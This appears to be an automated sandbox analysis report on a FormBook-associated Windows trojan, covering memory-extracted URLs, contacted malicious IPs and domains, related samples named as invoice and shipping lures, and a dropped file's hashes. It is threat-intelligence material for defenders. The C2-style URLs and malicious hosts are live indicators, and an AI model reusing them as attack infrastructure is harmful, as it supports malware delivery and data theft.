                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://whois.gandi.net/en/results?search=sunnyz.storeCkszoACLEZHP.exe, 00000006.00000002.4761022194.00000000042A4000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 00000007.00000002.4758770775.0000000005964000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2974919295.0000000029F34000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.earbudsstore.shop/t846?gp=1&js=1&uuid=1736535285.9772559917&other_args=eyJ1cmkiOiAiL3Q4NDCkszoACLEZHP.exe, 00000006.00000002.4761022194.00000000053EA000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 00000007.00000002.4760274457.0000000007CB0000.00000004.00000800.00020000.00000000.sdmp, choice.exe, 00000007.00000002.4758770775.0000000006AAA000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=choice.exe, 00000007.00000003.2868947216.00000000080B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://www.dymar.shop/index.php?route=account/loginCkszoACLEZHP.exe, 00000006.00000002.4761022194.0000000005258000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 00000007.00000002.4758770775.0000000006918000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://www.dymar.shop/informaciya-o-dostavkeCkszoACLEZHP.exe, 00000006.00000002.4761022194.0000000005258000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 00000007.00000002.4758770775.0000000006918000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://www.dymar.shop/index.php?route=account/wishlistchoice.exe, 00000007.00000002.4758770775.0000000006918000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://www.dymar.shop/index.php?route=account/orderCkszoACLEZHP.exe, 00000006.00000002.4761022194.0000000005258000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 00000007.00000002.4758770775.0000000006918000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://joker.com/?pk_campaign=Parking&pk_kwd=textCkszoACLEZHP.exe, 00000006.00000002.4761022194.0000000004A7E000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 00000007.00000002.4758770775.000000000613E000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                    		high
                                                                    http://www70.earbudsstore.shop/choice.exe, 00000007.00000002.4758770775.0000000006AAA000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://www.dymar.shop/index.php?route=account/accountchoice.exe, 00000007.00000002.4758770775.0000000006918000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchchoice.exe, 00000007.00000003.2868947216.00000000080B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://www.dymar.shop/image/cache/catalog/DYMAR%20250-300x300.jpgCkszoACLEZHP.exe, 00000006.00000002.4761022194.0000000005258000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 00000007.00000002.4758770775.0000000006918000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://hosting.xyz/wiki/hosting/errors/site-not-served/CkszoACLEZHP.exe, 00000006.00000002.4761022194.0000000004DA2000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 00000007.00000002.4758770775.0000000006462000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://www.dymar.shop/index.php?route=product/compareCkszoACLEZHP.exe, 00000006.00000002.4761022194.0000000005258000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 00000007.00000002.4758770775.0000000006918000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://djwe.bekru.wgljk.cn/123.htmlCkszoACLEZHP.exe, 00000006.00000002.4761022194.00000000045C8000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 00000007.00000002.4758770775.0000000005C88000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://www.dymar.shop/usloviya-soglasheniyaCkszoACLEZHP.exe, 00000006.00000002.4761022194.0000000005258000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 00000007.00000002.4758770775.0000000006918000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://54.244.188.177/OVZizpEU7Q.exe, 00000000.00000002.2315025935.0000000000D88000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: malware
                                                                      		unknown
                                                                      https://www.dymar.shop/index.php?route=account/registerCkszoACLEZHP.exe, 00000006.00000002.4761022194.0000000005258000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 00000007.00000002.4758770775.0000000006918000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://www.dymar.shop/index.php?route=affiliate/loginCkszoACLEZHP.exe, 00000006.00000002.4761022194.0000000005258000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 00000007.00000002.4758770775.0000000006918000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://www.google.com/images/branding/product/ico/googleg_lodp.icochoice.exe, 00000007.00000003.2868947216.00000000080B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://www.dymar.shop/index.php?route=common/language/languageCkszoACLEZHP.exe, 00000006.00000002.4761022194.0000000005258000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 00000007.00000002.4758770775.0000000006918000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        http://pywolwnvd.biz/OVZizpEU7Q.exe, 00000000.00000002.2312003459.0000000000CB8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://browsehappy.com/CkszoACLEZHP.exe, 00000006.00000002.4761022194.000000000557C000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 00000007.00000002.4758770775.0000000006C3C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                            		high
                                                                            https://www.dymar.shop/politika-bezopasnostiCkszoACLEZHP.exe, 00000006.00000002.4761022194.0000000005258000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 00000007.00000002.4758770775.0000000006918000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://hm.baidu.com/hm.js?1da591af2ff1138fe9a515dc33eb5bf7CkszoACLEZHP.exe, 00000006.00000002.4761022194.00000000045C8000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 00000007.00000002.4758770775.0000000005C88000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                              		high
                                                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=choice.exe, 00000007.00000003.2868947216.00000000080B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://www.dymar.shopchoice.exe, 00000007.00000002.4758770775.0000000006918000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://www.dymar.shop/image/catalog/DYMARCkszoACLEZHP.exe, 00000006.00000002.4761022194.0000000005258000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 00000007.00000002.4758770775.0000000006918000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://www.dymar.shop/index.php?route=product/manufacturerCkszoACLEZHP.exe, 00000006.00000002.4761022194.0000000005258000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 00000007.00000002.4758770775.0000000006918000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://www.gandi.net/en/domainCkszoACLEZHP.exe, 00000006.00000002.4761022194.00000000042A4000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 00000007.00000002.4758770775.0000000005964000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2974919295.0000000029F34000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://www.ecosia.org/newtab/choice.exe, 00000007.00000003.2868947216.00000000080B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://ac.ecosia.org/autocomplete?q=choice.exe, 00000007.00000003.2868947216.00000000080B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://54.244.188.177/wlyolqtsOVZizpEU7Q.exe, 00000000.00000002.2315025935.0000000000D91000.00000004.00000020.00020000.00000000.sdmp, OVZizpEU7Q.exe, 00000000.00000002.2315317261.0000000000D9C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: malware
                                                                                    		unknown
                                                                                    https://www.dymar.shop/index.php?route=error/not_found&amp;bbg=xricoPUhMXLl8f28VT4xzhY6t4bZSB0G1choice.exe, 00000007.00000002.4758770775.0000000006918000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    https://www.ukraine.com.ua/$CkszoACLEZHP.exe, 00000006.00000002.4761022194.0000000004DA2000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 00000007.00000002.4758770775.0000000006462000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    https://www.dymar.shop/index.php?route=information/contactchoice.exe, 00000007.00000002.4758770775.0000000006918000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    http://54.244.188.177/y#OVZizpEU7Q.exe, 00000000.00000002.2315025935.0000000000D88000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: malware
                                                                                    		unknown
                                                                                    http://54.244.188.177/rO#OVZizpEU7Q.exe, 00000000.00000002.2315025935.0000000000D88000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: malware
                                                                                    		unknown
                                                                                    https://www.dymar.shop/index.php?route=account/return/addCkszoACLEZHP.exe, 00000006.00000002.4761022194.0000000005258000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 00000007.00000002.4758770775.0000000006918000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    https://www.dymar.shop/index.php?route=account/newsletterCkszoACLEZHP.exe, 00000006.00000002.4761022194.0000000005258000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 00000007.00000002.4758770775.0000000006918000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=choice.exe, 00000007.00000003.2868947216.00000000080B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://www.ukraine.com.ua/wiki/hosting/errors/site-not-served/CkszoACLEZHP.exe, 00000006.00000002.4761022194.0000000004DA2000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 00000007.00000002.4758770775.0000000006462000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown

                                                                                      World Map of Contacted IPs

                                                                                      • No. of IPs < 25%
                                                                                      • 25% < No. of IPs < 50%
                                                                                      • 50% < No. of IPs < 75%
                                                                                      • 75% < No. of IPs

                                                                                      Public IPs

                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                      194.195.220.41
                                                                                      		www.earbudsstore.shopGermany
                                                                                      		6659NEXINTO-DEtrue
                                                                                      13.248.169.48
                                                                                      		www.snyp.shopUnited States
                                                                                      		16509AMAZON-02USfalse
                                                                                      209.74.77.107
                                                                                      		www.beyondfitness.liveUnited States
                                                                                      		31744MULTIBAND-NEWHOPEUStrue
                                                                                      194.245.148.189
                                                                                      		www.maitreyatoys.worldGermany
                                                                                      		5517CSLDEtrue
                                                                                      38.165.29.234
                                                                                      		www.8312zcksnu.bondUnited States
                                                                                      		174COGENT-174UStrue
                                                                                      185.104.45.157
                                                                                      		www.montero-beauty.onlineUkraine
                                                                                      		200000UKRAINE-ASUAtrue
                                                                                      154.23.184.207
                                                                                      		d48dk.topUnited States
                                                                                      		174COGENT-174UStrue
                                                                                      63.250.43.134
                                                                                      		oneeyetrousersnake.xyzUnited States
                                                                                      		22612NAMECHEAP-NETUStrue
                                                                                      156.251.17.224
                                                                                      		www.duwixushx.xyzSeychelles
                                                                                      		132839POWERLINE-AS-APPOWERLINEDATACENTERHKfalse
                                                                                      54.244.188.177
                                                                                      		pywolwnvd.bizUnited States
                                                                                      		16509AMAZON-02USfalse
                                                                                      38.181.21.178
                                                                                      		44ynh.topUnited States
                                                                                      		174COGENT-174UStrue
                                                                                      217.70.184.50
                                                                                      		webredir.vip.gandi.netFrance
                                                                                      		29169GANDI-ASDomainnameregistrar-httpwwwgandinetFRfalse
                                                                                      147.255.21.187
                                                                                      		www.50food.comUnited States
                                                                                      		7203LEASEWEB-USA-SFO-12UStrue
                                                                                      185.68.16.160
                                                                                      		www.dymar.shopUkraine
                                                                                      		200000UKRAINE-ASUAtrue

                                                                                      General Information

                                                                                      Joe Sandbox version:42.0.0 Malachite
                                                                                      Analysis ID:1587962
                                                                                      Start date and time:2025-01-10 19:49:51 +01:00
                                                                                      Joe Sandbox product:CloudBasic
                                                                                      Overall analysis duration:0h 10m 45s
                                                                                      Hypervisor based Inspection enabled:false
                                                                                      Report type:full
                                                                                      Cookbook file name:default.jbs
                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                      Number of analysed new started processes analysed:8
                                                                                      Number of new started drivers analysed:0
                                                                                      Number of existing processes analysed:0
                                                                                      Number of existing drivers analysed:0
                                                                                      Number of injected processes analysed:1
                                                                                      Technologies:
                                                                                      • HCA enabled
                                                                                      • EGA enabled
                                                                                      • AMSI enabled
                                                                                      Analysis Mode:default
                                                                                      Analysis stop reason:Timeout
                                                                                      Sample name:OVZizpEU7Q.exe
                                                                                      renamed because original name is a hash value
                                                                                      Original Sample Name:8ddfda62decd6de3185b1ec3bebe067a20a124a39f8483afa9bbc47b3f3d0c09.exe
                                                                                      Detection:MAL
                                                                                      Classification:mal100.spre.troj.spyw.evad.winEXE@8/6@18/14
                                                                                      EGA Information:
                                                                                      • Successful, ratio: 100%
                                                                                      HCA Information:
                                                                                      • Successful, ratio: 74%
                                                                                      • Number of executed functions: 61
                                                                                      • Number of non-executed functions: 249
                                                                                      Cookbook Comments:
                                                                                      • Found application associated with file extension: .exe
                                                                                      • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                      Warnings

                                                                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                      • Excluded IPs from analysis (whitelisted): 13.107.246.45, 20.190.159.73, 52.149.20.212
                                                                                      • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                      Simulations

                                                                                      Behavior and APIs

                                                                                      TimeTypeDescription
                                                                                      13:51:08API Interceptor1x Sleep call for process: OVZizpEU7Q.exe modified
                                                                                      13:52:22API Interceptor9620914x Sleep call for process: choice.exe modified

                                                                                      Joe Sandbox View / Context

                                                                                      IPs

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      194.195.220.41KSts9xW7qy.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.earbudsstore.shop/0gis/?F4=Q0yHy&xP7x=aMrcg/vn2G/nVrncRMrksgj//l1iguTCuDhUOTj2ocWrQXkoPHFbln1FmLoTaWY74KRoWkXSZUSbj2dC1qWbbVz+e205UYRB0QccYqidFK5nXCUGR2PtEFk=
                                                                                      Invoice 10493.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.earbudsstore.shop/0gis/?h7i-=tZtx&IUY=aMrcg/vn2G/nVrncRMm9sg/9wEZLpPTCuDhUOTj2ocWrQXkoPHFbln5FmLoTaWY74KRoWkXSZUSbj2dC1qWbeU//egp4ZoVrxwEcZqidFa5edjFbZGfsKVU=
                                                                                      A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.earbudsstore.shop/0gis/
                                                                                      A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.earbudsstore.shop/0gis/
                                                                                      SecuriteInfo.com.Win32.Malware-gen.10660.18305.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.gemtastic.shop/junu/
                                                                                      Quotation-27-08-24.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.techcables.shop/0hup/
                                                                                      TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.ytonetgearhub.shop/l8y2/
                                                                                      swift_payment_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.cheapdesklamp.shop/9nq7/
                                                                                      13.248.169.48QmBbqpEHu0.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.hsa.world/09b7/
                                                                                      cNDddMAF5u.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.bcg.services/5onp/
                                                                                      3HnH4uJtE7.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.shipley.group/5g1j/
                                                                                      KcSzB2IpP5.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.londonatnight.coffee/yvuf/?SDC=kadexEirh/+VAO8zLOQBjj7ri78LMX6rnGwiRgKyb2lIFzAlJiRuP0wbsEUUXC8rnmyzmDulN6bnJ3eZuWUqQAzy8gMCuzUMeqhoyPM0gWyFgi2HaQ==&mH=CpePy0P
                                                                                      TU0kiz3mxz.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.cleans.xyz/m25s/?uTm8l=sq9EZiryngIYllrGGegSwTPcoSeG1wK7r99iAR3vBwBIUuCUohOmEZYbiast2lA9LyAZ&eN9dz=nR-4vpW
                                                                                      QUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.bonheur.tech/t3iv/
                                                                                      QUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.bonheur.tech/t3iv/
                                                                                      ORDER REF 47896798 PSMCO.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                      • www.londonatnight.coffee/13to/
                                                                                      236236236.elfGet hashmaliciousUnknownBrowse
                                                                                      • portlandbeauty.com/
                                                                                      profroma invoice.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.aktmarket.xyz/wb7v/
                                                                                      209.74.77.107ORDER - 401.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.happyjam.life/4t49/
                                                                                      ORDER-401.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.learnwithus.site/a6qk/
                                                                                      PO2412010.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.beyondfitness.live/fbpt/
                                                                                      DHL_734825510.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.happyjam.life/4ii9/
                                                                                      SRT68.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.liveplah.live/2bf0/
                                                                                      UPDATED CONTRACT.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.gadgetre.info/8q8w/
                                                                                      PO 4110007694.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.learnwithus.site/alu5/
                                                                                      Latest advice payment.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.learnwithus.site/alu5/
                                                                                      SW_5724.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.happyjam.life/4ii9/
                                                                                      quotation.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.gadgetre.info/8q8w/

                                                                                      Domains

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      webredir.vip.gandi.netQuotation Request-349849.exeGet hashmaliciousFormBookBrowse
                                                                                      • 217.70.184.50
                                                                                      MA-DS-2024-03 URGENT.exeGet hashmaliciousFormBookBrowse
                                                                                      • 217.70.184.50
                                                                                      RFQ _ Virtue 054451000085.exeGet hashmaliciousFormBookBrowse
                                                                                      • 217.70.184.50
                                                                                      QUOTATON-37839993.exeGet hashmaliciousFormBookBrowse
                                                                                      • 217.70.184.50
                                                                                      PO# 81136575.exeGet hashmaliciousDarkTortilla, FormBookBrowse
                                                                                      • 217.70.184.50
                                                                                      Order No 24.exeGet hashmaliciousFormBookBrowse
                                                                                      • 217.70.184.50
                                                                                      RFQ.exeGet hashmaliciousFormBookBrowse
                                                                                      • 217.70.184.50
                                                                                      statement of accounts.exeGet hashmaliciousFormBookBrowse
                                                                                      • 217.70.184.50
                                                                                      RFQ.exeGet hashmaliciousFormBookBrowse
                                                                                      • 217.70.184.50
                                                                                      RFQ.exeGet hashmaliciousFormBookBrowse
                                                                                      • 217.70.184.50
                                                                                      s-part-0017.t-0009.t-msedge.netxrAlbTvRsz.exeGet hashmaliciousFormBookBrowse
                                                                                      • 13.107.246.45
                                                                                      Xf3rn1smZw.exeGet hashmaliciousRedLineBrowse
                                                                                      • 13.107.246.45
                                                                                      ThBJg59JRC.exeGet hashmaliciousFormBookBrowse
                                                                                      • 13.107.246.45
                                                                                      293816234142143228.jsGet hashmaliciousStrela DownloaderBrowse
                                                                                      • 13.107.246.45
                                                                                      Voicemail_+Transcription+_ATT006151.docxGet hashmaliciousUnknownBrowse
                                                                                      • 13.107.246.45
                                                                                      https://www.mentimeter.com/app/presentation/alp52o7zih4ubnvbqe9pvb585a1z3bd7/edit?source=share-modalGet hashmaliciousUnknownBrowse
                                                                                      • 13.107.246.45
                                                                                      MWP0FO5rAF.exeGet hashmaliciousUnknownBrowse
                                                                                      • 13.107.246.45
                                                                                      3HnH4uJtE7.exeGet hashmaliciousFormBookBrowse
                                                                                      • 13.107.246.45
                                                                                      Encrypted_Archive_2025_LHC1W64SMW.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                      • 13.107.246.45
                                                                                      GcA5z6ZWRK.exeGet hashmaliciousUnknownBrowse
                                                                                      • 13.107.246.45
                                                                                      www.50food.comCV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                                                      • 147.255.21.187
                                                                                      CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                                                      • 147.255.21.187

                                                                                      ASNs

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      MULTIBAND-NEWHOPEUSJ1VpshZJfm.exeGet hashmaliciousFormBookBrowse
                                                                                      • 209.74.79.42
                                                                                      NWPZbNcRxL.exeGet hashmaliciousFormBookBrowse
                                                                                      • 209.74.79.42
                                                                                      zE1VxVoZ3W.exeGet hashmaliciousFormBookBrowse
                                                                                      • 209.74.79.42
                                                                                      KSts9xW7qy.exeGet hashmaliciousFormBookBrowse
                                                                                      • 209.74.77.109
                                                                                      rQuotation.exeGet hashmaliciousFormBookBrowse
                                                                                      • 209.74.79.40
                                                                                      TNT AWB TRACKING DETAILS.exeGet hashmaliciousFormBookBrowse
                                                                                      • 209.74.64.189
                                                                                      z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeGet hashmaliciousFormBookBrowse
                                                                                      • 209.74.79.41
                                                                                      ORDER - 401.exeGet hashmaliciousFormBookBrowse
                                                                                      • 209.74.77.107
                                                                                      SC_TR11670000_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                      • 209.74.64.58
                                                                                      PO 1202495088.exeGet hashmaliciousFormBookBrowse
                                                                                      • 209.74.79.40
                                                                                      CSLDEKSts9xW7qy.exeGet hashmaliciousFormBookBrowse
                                                                                      • 194.245.148.189
                                                                                      miori.arm.elfGet hashmaliciousUnknownBrowse
                                                                                      • 194.245.229.87
                                                                                      sh4.elfGet hashmaliciousMiraiBrowse
                                                                                      • 194.245.229.64
                                                                                      Fantazy.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                      • 194.245.230.66
                                                                                      nabmips.elfGet hashmaliciousUnknownBrowse
                                                                                      • 159.25.86.139
                                                                                      nshkmpsl.elfGet hashmaliciousMiraiBrowse
                                                                                      • 194.245.230.82
                                                                                      z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeGet hashmaliciousFormBookBrowse
                                                                                      • 194.245.148.189
                                                                                      x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                      • 194.245.186.15
                                                                                      PAYMENT_ADVICE.exeGet hashmaliciousFormBookBrowse
                                                                                      • 194.245.148.189
                                                                                      A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                                      • 194.245.148.189
                                                                                      NEXINTO-DE4.elfGet hashmaliciousUnknownBrowse
                                                                                      • 195.179.60.63
                                                                                      KSts9xW7qy.exeGet hashmaliciousFormBookBrowse
                                                                                      • 194.195.220.41
                                                                                      ATT562720.htmGet hashmaliciousUnknownBrowse
                                                                                      • 194.163.42.36
                                                                                      m68k.elfGet hashmaliciousMiraiBrowse
                                                                                      • 212.229.142.163
                                                                                      loligang.x86.elfGet hashmaliciousMiraiBrowse
                                                                                      • 212.228.15.172
                                                                                      chernobyl.i586.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                      • 195.179.230.64
                                                                                      chernobyl.sparc.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                      • 195.179.230.64
                                                                                      chernobyl.arm7.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                      • 195.179.230.64
                                                                                      chernobyl.arm5.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                      • 195.179.230.64
                                                                                      chernobyl.arm4.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                      • 195.179.230.64
                                                                                      AMAZON-02USQmBbqpEHu0.exeGet hashmaliciousFormBookBrowse
                                                                                      • 13.248.169.48
                                                                                      frosty.arm.elfGet hashmaliciousMiraiBrowse
                                                                                      • 18.140.171.98
                                                                                      frosty.spc.elfGet hashmaliciousMiraiBrowse
                                                                                      • 54.189.236.62
                                                                                      Message.emlGet hashmaliciousUnknownBrowse
                                                                                      • 34.249.87.52
                                                                                      frosty.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                      • 18.188.126.130
                                                                                      cNDddMAF5u.exeGet hashmaliciousFormBookBrowse
                                                                                      • 13.248.169.48
                                                                                      https://eu2.contabostorage.com/69e36f1a5de941bb877627f90e79fd6d:gip/document.html#phishme@arrowbank.comGet hashmaliciousHTMLPhisherBrowse
                                                                                      • 108.138.26.73
                                                                                      RubzLi27lr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 3.130.71.34
                                                                                      3HnH4uJtE7.exeGet hashmaliciousFormBookBrowse
                                                                                      • 13.248.169.48
                                                                                      https://www.mentimeter.com/app/presentation/alp52o7zih4ubnvbqe9pvb585a1z3bd7/edit?source=share-modalGet hashmaliciousUnknownBrowse
                                                                                      • 108.138.26.78

                                                                                      JA3 Fingerprints

                                                                                      No context

                                                                                      Dropped Files

                                                                                      No context

                                                                                      Created / dropped Files

                                                                                      C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\OVZizpEU7Q.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):1658880
                                                                                      Entropy (8bit):4.313001536974501
                                                                                      Encrypted:false
                                                                                      SSDEEP:24576:cxGBcmlvVg9N9JMlDlfjRiVuVsWt5MJMs:YGy+dgFIDRRAubt5M
                                                                                      MD5:43F9E491CFEB42E75ED6C50912305629
                                                                                      SHA1:8EE292C9FA957F75A18982BDA23C37FFF139A026
                                                                                      SHA-256:840D8BA88C5E9EE536B06F18CAC34130194A364519E3B3CB274BC56338CC17A9
                                                                                      SHA-512:BED50B566BE0CEF57C0A5EBBA087877B607E61726F3ECEB8546AB14EADB02801803E91E866F414FC8F34816A29409BBED1AA764EF6BD15FE90080D8F7C7516A4
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                      Reputation:low
